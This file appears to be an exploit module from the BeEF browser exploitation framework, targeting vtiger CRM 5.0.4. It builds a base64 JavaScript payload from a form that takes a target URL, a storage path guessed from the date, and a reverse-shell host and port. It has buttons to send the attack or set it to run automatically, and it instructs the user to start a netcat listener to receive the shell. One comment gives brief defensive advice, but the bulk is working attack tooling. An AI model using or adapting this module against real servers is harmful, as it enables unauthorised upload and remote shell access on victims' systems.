beef/modules/network/vtiger_crm_upload_exploit/index.php
wade@bindshell.net 03ffb4703d Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-01-11 00:54:08 +00:00


<?
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)

// common.inc.php is pulled in for get_b64_file(), which the script section
// below uses to embed the JavaScript template.
require_once '../../../include/common.inc.php';

// Path of the JavaScript template, relative to this module's directory.
define('JS_FILE', './template.js');

// Default value for the "Target Directory" form field. It has the shape
// /storage/<year>/<month name>/week<n>/ (example: /storage/2009/June/week3/<file>)
// and is built from the current date only.
// NOTE(review): a storage location that follows from the date alone is
// guessable; on the defending side, uploads kept outside the web root, or in a
// directory where scripts are never executed, do not depend on the path
// staying unknown.
$year = date('Y');
$month = date('F');
// ISO-8601 week of today minus ISO-8601 week of the first day of this month,
// counted from 1.
$weekNum = date('W') - date('W', strtotime(date('Y-m-01'))) + 1;
$path = sprintf('/storage/%s/%s/week%s/', $year, $month, $weekNum);
?>
<script>
// Status text substituted for the RTN placeholder of the template.
var rtnval = "vtiger exploit sent";

/**
 * Returns the base64-encoded JavaScript template with its placeholders
 * replaced by the values currently entered in the module form.
 *
 * The template text is embedded server-side through get_b64_file(JS_FILE);
 * the substitutions themselves are delegated to b64replace(), which is
 * defined outside this file.
 */
function get_b64_code_vtiger() {
	var form = document.myform;

	// Placeholder name paired with its replacement, kept in the original order.
	var substitutions = [
		["ATTACKURL", form.vtiger_url.value],
		["FILEPATH", form.vtiger_filepath.value],
		["CONNECTHOST", form.vtiger_host.value],
		["CONNECTPORT", form.vtiger_port.value],
		["RTN", rtnval]
	];

	// javascript is loaded from a file - it could be hard coded
	var encoded = '<? echo get_b64_file(JS_FILE); ?>';

	for (var i = 0; i < substitutions.length; i++) {
		encoded = b64replace(encoded, substitutions[i][0], substitutions[i][1]);
	}
	return encoded;
}
// The two button actions are attached to Element.Methods and published with
// Element.addMethods() (presumably Prototype's element-extension API; the
// library itself is loaded outside this file). The form buttons call them
// from their inline onClick handlers.

// "Set Autorun": hands the generated code to ar.enable() under this module's
// display name. `ar` is defined elsewhere.
Element.Methods.set_autorun = function() {
	var encoded = get_b64_code_vtiger();
	ar.enable('Vtiger CRM Upload Exploit', encoded);
};

// "Send Now": hands the generated code to do_send(), defined elsewhere.
Element.Methods.send_now = function() {
	var encoded = get_b64_code_vtiger();
	do_send(encoded);
};

// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Vtiger CRM Upload Exploit</div>
This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability
which is exploited is in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a>.<br><br>
Start the listener on the host:
<pre>
nc -nvlp 8888
</pre>
<div id="module_subsection">
<form name="myform">
Target Web Server
<input type="text" name="vtiger_url" value="http://localhost/vtigercrm"/>
Target Directory
<input type="text" name="vtiger_filepath" value="<?php echo $path;?>"/>
Reverse Bindshell Host
<input type="text" name="vtiger_host" value="localhost"/>
Reverse Bindshell Port
<input type="text" name="vtiger_port" value="8888"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>